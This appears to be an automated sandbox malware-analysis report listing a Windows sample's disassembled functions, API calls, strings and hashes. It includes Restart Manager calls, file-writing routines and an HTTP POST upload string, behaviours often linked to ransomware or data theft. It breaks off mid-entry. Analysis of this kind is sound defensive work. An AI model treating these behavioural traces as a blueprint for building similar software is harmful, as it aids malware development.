                                                                                                                                                                                                  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
                                                                                                                                                                                                  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0015AF79
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,?), ref: 0015AF82
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$Heap$AllocH_prolog3H_prolog3_catch_Processctype
                                                                                                                                                                                                • String ID: 17211235534172093521$18081020163143810973$8780785037186610294$@$Kernel32.dll$ntdll.dll
                                                                                                                                                                                                • API String ID: 614703607-287778538
                                                                                                                                                                                                • Opcode ID: 4efc008c914f5768d20726c3ed0c5da183daef60985afa9bd89991564b7da609
                                                                                                                                                                                                • Instruction ID: f52b8b56d5f60b54316e3fc67eefa342eed91d5b2354abea9959a2ab7184b030
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4efc008c914f5768d20726c3ed0c5da183daef60985afa9bd89991564b7da609
                                                                                                                                                                                                • Instruction Fuzzy Hash: 035149B1D00349EFDF01EFA8C885ADEBBB8AF18344F54416AE404BB291DB705E45CBA1
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0015F7D6
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0015F7E4
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0015F7F5
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0015F806
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                • API String ID: 667068680-1247241052
                                                                                                                                                                                                • Opcode ID: 9aec8df63765eeaa07cb1de423ac031f11912b98198fb7314bd3126821a49ba9
                                                                                                                                                                                                • Instruction ID: df80023b351bc8fa284672c7ff9a841ce05e90350600821e44fb0a58b42e2645
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9aec8df63765eeaa07cb1de423ac031f11912b98198fb7314bd3126821a49ba9
                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE0EC71949310AFC7007FB0BC0E8867EB8EF0A7513114026F505D3AA4D77586C8CF9A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 00162857
                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 00162965
                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00162AB7
                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00162AD2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                • API String ID: 2751267872-393685449
                                                                                                                                                                                                • Opcode ID: 119aaa9a4b3e2755dc33fbc4625ca57671a101ba96d8ff4965f7ab16a771a6db
                                                                                                                                                                                                • Instruction ID: f2722fdfb43ce8dce5824bc69db4a4ce17d82af4053a80ab89c548cb7f0856e3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 119aaa9a4b3e2755dc33fbc4625ca57671a101ba96d8ff4965f7ab16a771a6db
                                                                                                                                                                                                • Instruction Fuzzy Hash: 18B19A71800A19EFCF29DFA4CC819AEBBB5FF28311F14455AE8116B252D374DA71CB91
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 0-3907804496
                                                                                                                                                                                                • Opcode ID: 221d12493d68f2aeb881d70dd8c3400ee18e512f2588b415a1715da4673892d8
                                                                                                                                                                                                • Instruction ID: 45ac7bdd4a1b01b8faf885625c0feb7af32c451be129b8a9780d0e75f73be166
                                                                                                                                                                                                • Opcode Fuzzy Hash: 221d12493d68f2aeb881d70dd8c3400ee18e512f2588b415a1715da4673892d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: FBB13570E04249AFDB15DFA8CC81BAD7BB1BF59300F148159F959AB382C7709E81DBA1
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 127012223-0
                                                                                                                                                                                                • Opcode ID: 4ae7489488a2c6b3d259e85c4f1fbd78ff447e4b4c1353ffdcbb2ed4b4aeb901
                                                                                                                                                                                                • Instruction ID: 78bcedd1a0fe6c0e3a0f8a96252a57a4056dc118ee51318f061618735e33cc91
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ae7489488a2c6b3d259e85c4f1fbd78ff447e4b4c1353ffdcbb2ed4b4aeb901
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9371D472900209ABDF219E548C52FAFBBF99F4D314F298499EA1DA7281E735DC40C7A1
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0015F9DF
                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0015FA0B
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0015FA4A
                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0015FA67
                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0015FAA6
                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0015FAC3
                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0015FB05
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0015FB28
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2040435927-0
                                                                                                                                                                                                • Opcode ID: f912e89699a35664a3399c348dc54388ad4ed693fad0d19689a5e5786d55f91d
                                                                                                                                                                                                • Instruction ID: 8757e808f020e632445316af4ac4e26735b347229bc9c9970b2b72760d20f640
                                                                                                                                                                                                • Opcode Fuzzy Hash: f912e89699a35664a3399c348dc54388ad4ed693fad0d19689a5e5786d55f91d
                                                                                                                                                                                                • Instruction Fuzzy Hash: AB518C7250021AEBEF209F64CC45FAB7BAAEB44752F254039FD25EB190D7708D5ACB50
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                • Opcode ID: 12cbd57efc24f00b10807126745757f58c8e6f66b67890c3a73c114f1d70c3a1
                                                                                                                                                                                                • Instruction ID: 18e6f25e50fcb9c91c6abb0e5da2b30af5c5140b42c8374bc5b02ce25fc30df6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 12cbd57efc24f00b10807126745757f58c8e6f66b67890c3a73c114f1d70c3a1
                                                                                                                                                                                                • Instruction Fuzzy Hash: B0B16932A042959FDB25CF68CC81BBE7BB5EF2A350F15C155F908AB282D374D901C7A0
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0014667B
                                                                                                                                                                                                  • Part of subcall function 00146543: __EH_prolog3_GS.LIBCMT ref: 0014654D
                                                                                                                                                                                                • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00146893
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$DebugOutputString
                                                                                                                                                                                                • String ID: --------$($Content-Type: application/octet-stream; boundary=----$POST
                                                                                                                                                                                                • API String ID: 345087456-2938435220
                                                                                                                                                                                                • Opcode ID: fedf2cf3357ed143455d911818b3163cfd045cdb26ff17c04965ecbac2fa4d25
                                                                                                                                                                                                • Instruction ID: 6df82dbaa2dbe38eb9e15554619f93e5980460bab9062fa52b3e837d48d4ae9e
                                                                                                                                                                                                • Opcode Fuzzy Hash: fedf2cf3357ed143455d911818b3163cfd045cdb26ff17c04965ecbac2fa4d25
                                                                                                                                                                                                • Instruction Fuzzy Hash: D07186B0A002199FDF209F10CD85BBE77B8EF85715F004199FA09A7192DB709E85CFA5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
• RmStartSession.RSTRTMGR(?,00000000,?,?,?,00000000), ref: 0015B3F0
  • Part of subcall function 0015ABF2: __EH_prolog3_GS.LIBCMT ref: 0015ABF9
  • Part of subcall function 0015ABF2: ctype.LIBCPMT ref: 0015ACB5
• RmRegisterResources.RSTRTMGR(?,00000001,?,00000000,00000000,00000000,00000000), ref: 0015B43F
• RmGetList.RSTRTMGR(?,?,0000000A,?,?), ref: 0015B479
• GetCurrentProcessId.KERNEL32 ref: 0015B493
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0015B4CF
• CloseHandle.KERNEL32(00000000), ref: 0015B4D6
• RmEndSession.RSTRTMGR(?), ref: 0015B4F9
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_Session$CloseCurrentH_prolog3_catch_HandleListObjectProcessRegisterResourcesSingleStartWaitctype
• String ID:
• API String ID: 4225474974-0
• Opcode ID: 3016b83f0b0e9ec741b27bd7da5622cfa8b13d1eb0dcfa1d3275a0e36f115582
• Instruction ID: cbe6d63a732b9a4b4de6ee70d99bce54b463cbc0e9b53e546ea0bb86978a8231
• Opcode Fuzzy Hash: 3016b83f0b0e9ec741b27bd7da5622cfa8b13d1eb0dcfa1d3275a0e36f115582
• Instruction Fuzzy Hash: E2519D71A05218EFDB21DB64CD89ADE7BB8EF16340F4001A5F80AA7591D7345F88CB52
APIs
• _ValidateLocalCookies.LIBCMT ref: 001601D7
• ___except_validate_context_record.LIBVCRUNTIME ref: 001601DF
• _ValidateLocalCookies.LIBCMT ref: 00160268
• __IsNonwritableInCurrentImage.LIBCMT ref: 00160293
• _ValidateLocalCookies.LIBCMT ref: 001602E8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 72975694abdcd64db6527be9c0f4c5f02fa20c53c93684fa6105b7f1aa542aba
• Instruction ID: 48bb002ebb036b8637cbd7d757864000128f94a9a9ba3b0769fa40be42637ee2
• Opcode Fuzzy Hash: 72975694abdcd64db6527be9c0f4c5f02fa20c53c93684fa6105b7f1aa542aba
• Instruction Fuzzy Hash: 2A419534A00218DBCF16DF68CC95AAFBBB5EF49314F148159E8146B392D731DA65CB90
APIs
• __EH_prolog3.LIBCMT ref: 0015A39A
• std::_Lockit::_Lockit.LIBCPMT ref: 0015A3A7
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0015A3F8
  • Part of subcall function 0015DF22: _Yarn.LIBCPMT ref: 0015DF41
  • Part of subcall function 0015DF22: _Yarn.LIBCPMT ref: 0015DF65
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0015A44A
• std::_Lockit::~_Lockit.LIBCPMT ref: 0015A4D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: std::_$Locinfo::_LockitYarn$H_prolog3Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2469272659-1405518554
• Opcode ID: 5e7fbf2ba5997aeb8a6c089c6f508245f6bcf3c239edf5e7d6abe14f72b8eecb
• Instruction ID: 71edc2b827f50ba0034f4711b78f07be517b50b5cd7bb67cab8a26934802b4db
• Opcode Fuzzy Hash: 5e7fbf2ba5997aeb8a6c089c6f508245f6bcf3c239edf5e7d6abe14f72b8eecb
• Instruction Fuzzy Hash: 9941BF31809B84DFCB31DFA9D94174AFBF0AF14311F24C6AEE09A97681C7749A08CB55
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,4B460E4E,?,00171E59,?,?,00000000,?), ref: 00171E0B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 0b992f1f5bad3a7a6b9f925e796dffb6de5d943991d68170f824d2d3973c73ef
• Instruction ID: f56303ac8f4b0c5d9ef85a59ec7d6cbd942b8d19b429e65f7234ae3cb73eaba0
• Opcode Fuzzy Hash: 0b992f1f5bad3a7a6b9f925e796dffb6de5d943991d68170f824d2d3973c73ef
• Instruction Fuzzy Hash: 1121EB72A00610B7D7319BA9DC49A5E3779AF427A0F254165F819A72D1DB30EE40CBE1
APIs
• __allrem.LIBCMT ref: 00163F1A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00163F36
• __allrem.LIBCMT ref: 00163F4D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00163F6B
• __allrem.LIBCMT ref: 00163F82
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00163FA0
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: c2c21de6e89a5a046325f8e7b47af35d8f050f99e2fc3b5b3c456845d04feeb3
• Instruction ID: c596a47d3b08497522cef2cb4bb765e918b0311d93761d0c8df1228793acb312
• Opcode Fuzzy Hash: c2c21de6e89a5a046325f8e7b47af35d8f050f99e2fc3b5b3c456845d04feeb3
• Instruction Fuzzy Hash: D7811772A007129BD724AF78CC81BABB7F9AF54320F24812EF525D7681E770DB548B90
APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00157644
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00157679
• SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000), ref: 0015768C
• WriteFile.KERNEL32(00000000,?,00000001,?,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000), ref: 001576A3
• CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001576AA
• CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001576B9
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: File$CloseCreateHandle$PointerWrite
• String ID:
• API String ID: 2606874340-0
• Opcode ID: 9f0b711c66d8cf4e0e55b7602b36a43e3ddf20981ddd45db5ac80c7bc9e51eaa
• Instruction ID: 3794021a179466e6d24e3703a7f73d1236afabcc36d945f0b7c37b3855b6fd43
• Opcode Fuzzy Hash: 9f0b711c66d8cf4e0e55b7602b36a43e3ddf20981ddd45db5ac80c7bc9e51eaa
• Instruction Fuzzy Hash: B8214C71A00204EFE7249B6CED4AF6B77BCEB48711F100659F526DB2D1D6B0A9488B64
APIs
                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0015E3C9
                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0015E3D3
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: __EH_prolog3_GS.LIBCMT ref: 0015A4F1
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0015A502
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0015A524
                                                                                                                                                                                                • codecvt.LIBCPMT ref: 0015E40D
                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0015E424
                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0015E444
                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0015E451
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registercodecvt
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 878568432-0
                                                                                                                                                                                                • Opcode ID: 01332a55ca82bba43db3718eb2c8b5cc6bfeb3d78df53c388210544608fd4812
                                                                                                                                                                                                • Instruction ID: c393733ac607e995163ec22a266c0c0e16b4936773ddc631c1f04f0097c818ef
                                                                                                                                                                                                • Opcode Fuzzy Hash: 01332a55ca82bba43db3718eb2c8b5cc6bfeb3d78df53c388210544608fd4812
                                                                                                                                                                                                • Instruction Fuzzy Hash: B511E471900225DFCB19EBA4D9426AE7BF5EF50312F54441DED26EB381EB709B09CB82
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,001623C1,0016051C,0015D594), ref: 001623D8
                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001623E6
                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001623FF
                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,001623C1,0016051C,0015D594), ref: 00162451
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                • Opcode ID: 2e8815d7a6bedc7f397a209a7343cc6598465bacd9e5e93cf7cb9a8ba18a1661
                                                                                                                                                                                                • Instruction ID: 029acd94e6fafdcd8e1c1547e91c920535505704af228ff67075939d15faa3b6
